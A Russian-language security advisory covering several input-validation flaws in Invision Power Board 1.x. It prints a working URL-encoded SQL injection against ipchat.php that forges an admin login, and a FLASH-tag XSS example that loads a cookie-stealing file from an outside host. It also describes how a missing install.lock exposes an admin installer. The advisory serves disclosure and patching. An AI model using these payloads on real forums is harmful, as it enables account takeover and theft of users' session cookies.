| Дата публикации: | 17.07.2003 | 
| Дата изменения: | 17.10.2006 | 
| Всего просмотров: | 4611 | 
| Опасность: | Средняя | 
| Наличие исправления: | Да | 
| Количество уязвимостей: | 1 | 
| CVE ID: | Нет данных | 
| Вектор эксплуатации: | Удаленная | 
| Воздействие: | 
																									Межсайтовый скриптинг																					 Раскрытие важных данных Неавторизованное изменение данных  | 
			
| CWE ID: | Нет данных | 
| Наличие эксплоита: | Нет данных | 
| Уязвимые продукты: | Invision Power Board 1.x | 
| Описание: | Несколько уязвимостей в проверке правильности входных данных обнаружено в
 Invision Power Board. Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение.
 1. SQl инъекция в 'ipchat.php': http://localhost/ibo/ipchat.php?password=1&username=9x%2527+union+sel ect+%25271%2527,%2527c4ca4238a0b923820dcc509a6f75849b%2527,%2527admin%2527,1%252f*+ 2. XSS в 'Post.php'. Удаленный пользователь может вставить специально обработанный FLASH тэг внутри HTML кода, чтобы выполнить произвольный HTML код в браузере пользователя, просматривающего это сообщение. Пример: [FLASH=2,2]http://anotherhost.ext/cookie-thief.swf[/FLASH]2. Также сообщается, что если отсутствует installer-lockfile (install.lock) файл на целеовй системе, то удаленный пользователь может вызвать файл "sm_install.php", чтобы получить привилегии администратора. Уязвимость обнаружена в Invision Power Board 1.1.2 Для устранения уязвимости, установите обновленную версию программы, которую можно скачать отсюда:  | 
		
| Ссылки: | Invision Power Board v1.1.2 |